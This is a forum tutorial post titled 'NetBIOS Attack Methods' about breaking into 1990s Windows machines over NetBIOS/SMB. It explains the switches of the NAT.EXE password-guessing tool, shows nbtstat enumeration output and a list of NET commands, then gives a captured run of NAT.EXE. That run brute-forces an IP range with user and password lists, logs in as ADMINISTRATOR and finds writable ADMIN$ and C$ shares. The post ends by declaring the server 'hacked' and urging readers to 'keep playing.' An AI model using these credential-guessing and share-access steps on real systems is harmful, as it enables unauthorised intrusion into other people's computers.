Jump to content
Sw0rdFish

NetBIOS Attack Methods

By Sw0rdFish, in Tutoriale in engleza

Recommended Posts

Sw0rdFish Newbie

Sw0rdFish

Posted
Posted

This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation, NT 4.0 Server,

NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, Windows 98 beta 2.1. One of the components

being used is NAT.EXE by Andrew Tridgell. A discussion of the tool, it switches, and common

techniques follows:

NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

Switches:

-o Specify the output file. All results from the scan

will be written to the specified file, in addition

to standard output.

-u Specify the file to read usernames from. Usernames

will be read from the specified file when attempt-

ing to guess the password on the remote server.

Usernames should appear one per line in the speci-

fied file.

-p Specify the file to read passwords from. Passwords

will be read from the specified file when attempt-

ing to guess the password on the remote server.

Passwords should appear one per line in the speci-

fied file.

<address>

Addresses should be specified in comma deliminated

format, with no spaces. Valid address specifica-

tions include:

hostname - "hostname" is added

127.0.0.1-127.0.0.3, adds addresses 127.0.0.1

through 127.0.0.3

127.0.0.1-3, adds addresses 127.0.0.1 through

127.0.0.3

127.0.0.1-3,7,10-20, adds addresses 127.0.0.1

through 127.0.0.3, 127.0.0.7, 127.0.0.10 through

127.0.0.20.

hostname,127.0.0.1-3, adds "hostname" and 127.0.0.1

through 127.0.0.1

All combinations of hostnames and address ranges as

specified above are valid.

C:nbtstat -A XXX.XX.XXX.XX

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

STUDENT1 <20> UNIQUE Registered

STUDENT1 <00> UNIQUE Registered

DOMAIN1 <00> GROUP Registered

DOMAIN1 <1C> GROUP Registered

DOMAIN1 <1B> UNIQUE Registered

STUDENT1 <03> UNIQUE Registered

DOMAIN1 <1E> GROUP Registered

DOMAIN1 <1D> UNIQUE Registered

..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-C0-4F-C4-8C-9D

Here is a partial NetBIOS 16th bit listing:

Computername <00> UNIQUE workstation service name

<00> GROUP domain name

Server <20> UNIQUE Server Service name

Computername <03> UNIQUE Registered by the messenger service. This is the computername

to be added to the LMHOSTS file which is not necessary to use

NAT.EXE but is necessary if you would like to view the remote

computer in Network Neighborhood.

Username <03> Registered by the messenger service.

Domainname <1B> Registers the local computer as the master browser for the domain

Domainname <1C> Registers the computer as a domain controller for the domain

(PDC or BDC)

Domainname <1D> Registers the local client as the local segments master browser

for the domain

Domainname <1E> Registers as a Group NetBIOS Name

<BF> Network Monitor Name

<BE> Network Monitor Agent

<06> RAS Server

<1F> Net DDE

<21> RAS Client

* Net Accounts: This command shows current settings for password, logon limitations, and

domain information. It also contains options for updating the User accounts database and

modifying password and logon requirements.

* Net Computer: This adds or deletes computers from a domains database.

* Net Config Server or Net Config Workstation: Displays config info about the server

service. When used without specifying Server or Workstation, the command displays a list of

configurable services.

* Net Continue: Reactivates an NT service that was suspended by a NET PAUSE

command.

* Net File: This command lists the open files on a server and has options for closing shared

files and removing file locks.

* Net Group: This displays information about group names and has options you can use to

add or modify global groups on servers.

* Net Help: Help with these commands

* Net Helpmsg message#: Get help with a particular net error or function message.

* Net Localgroup: Use this to list local groups on servers. You can also modify those

groups.

* Net Name: This command shows the names of computers and users to which messages

are sent on the computer.

* Net Pause: Use this command to suspend a certain NT service.

* Net Print: Displays print jobs and shared queues.

* Net Send: Use this command to send messages to other users, computers, or messaging

names on the network.

* Net Session: Shows information about current sessions. Also has commands for

disconnecting certain sessions.

* Net Share: Use this command to list information about all resources being shared on a

computer. This command is also used to create network shares.

* Net Statistics Server or Workstation: Shows the statistics log.

* Net Stop: Stops NT services, cancelling any connections the service is using. Let it be

known that stopping one service, may stop other services.

* Net Time: This command is used to display or set the time for a computer or domain.

* Net Use: This displays a list of connected computers and has options for connecting to

and disconnecting from shared resources.

* Net User: This command will display a list of user accounts for the computer, and has

options for creating a modifying those accounts.

* Net View: This command displays a list of resources being shared on a computer.

Including netware servers.

Special note on DOS and older Windows Machines: The commands listed above are

available to Windows NT Servers and Workstation, DOS and older Windows clients have these

NET commands available:

Net Config

Net Diag (runs the diagnostic program)

Net Help

Net Init (loads protocol and network adapter drivers.)

Net Logoff

Net Logon

Net Password (changes password)

Net Print

Net Start

Net Stop

Net Time

Net Use

Net Ver (displays the type and version of the network redirector)

Net View

For this section, the command being used is the NET VIEW and NET USE commands.

An actual example of how the NAT.EXE program is used. The information listed here is

an actual capture of the activity. The IP addresses have been changed to protect, well, us.

C:nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY

[*]--- Reading usernames from userlist.txt

[*]--- Reading passwords from passlist.txt

[*]--- Checking host: XXX.XX.XXX.XX

[*]--- Obtaining list of remote NetBIOS names

[*]--- Attempting to connect with name: *

[*]--- Unable to connect

[*]--- Attempting to connect with name: *SMBSERVER

[*]--- CONNECTED with name: *SMBSERVER

[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03

[*]--- Server time is Mon Dec 01 07:44:34 1997

[*]--- Timezone is UTC-6.0

[*]--- Remote server wants us to encrypt, telling it not to

[*]--- Attempting to connect with name: *SMBSERVER

[*]--- CONNECTED with name: *SMBSERVER

[*]--- Attempting to establish session

[*]--- Was not able to establish session with no password

[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'

[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'

[*]--- Obtained server information:

Server=[sTUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

Sharename Type Comment

--------- ---- -------

ADMIN$ Disk: Remote Admin

C$ Disk: Default share

IPC$ IPC: Remote IPC

NETLOGON Disk: Logon server share

Test Disk:

[*]--- This machine has a browse list:

Server Comment

--------- -------

STUDENT1

[*]--- Attempting to access share: *SMBSERVER

[*]--- Unable to access

[*]--- Attempting to access share: *SMBSERVERADMIN$

[*]--- WARNING: Able to access share: *SMBSERVERADMIN$

[*]--- Checking write access in: *SMBSERVERADMIN$

[*]--- WARNING: Directory is writeable: *SMBSERVERADMIN$

[*]--- Attempting to exercise .. bug on: *SMBSERVERADMIN$

[*]--- Attempting to access share: *SMBSERVERC$

[*]--- WARNING: Able to access share: *SMBSERVERC$

[*]--- Checking write access in: *SMBSERVERC$

[*]--- WARNING: Directory is writeable: *SMBSERVERC$

[*]--- Attempting to exercise .. bug on: *SMBSERVERC$

[*]--- Attempting to access share: *SMBSERVERNETLOGON

[*]--- WARNING: Able to access share: *SMBSERVERNETLOGON

[*]--- Checking write access in: *SMBSERVERNETLOGON

[*]--- Attempting to exercise .. bug on: *SMBSERVERNETLOGON

[*]--- Attempting to access share: *SMBSERVERTest

[*]--- WARNING: Able to access share: *SMBSERVERTest

[*]--- Checking write access in: *SMBSERVERTest

[*]--- Attempting to exercise .. bug on: *SMBSERVERTest

[*]--- Attempting to access share: *SMBSERVERD$

[*]--- Unable to access

[*]--- Attempting to access share: *SMBSERVERROOT

[*]--- Unable to access

[*]--- Attempting to access share: *SMBSERVERWINNT$

[*]--- Unable to access

If the default share of Everyone/Full Control is active, then you are done, the server is hacked. If

not, keep playing. You will be surprised what you find out.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...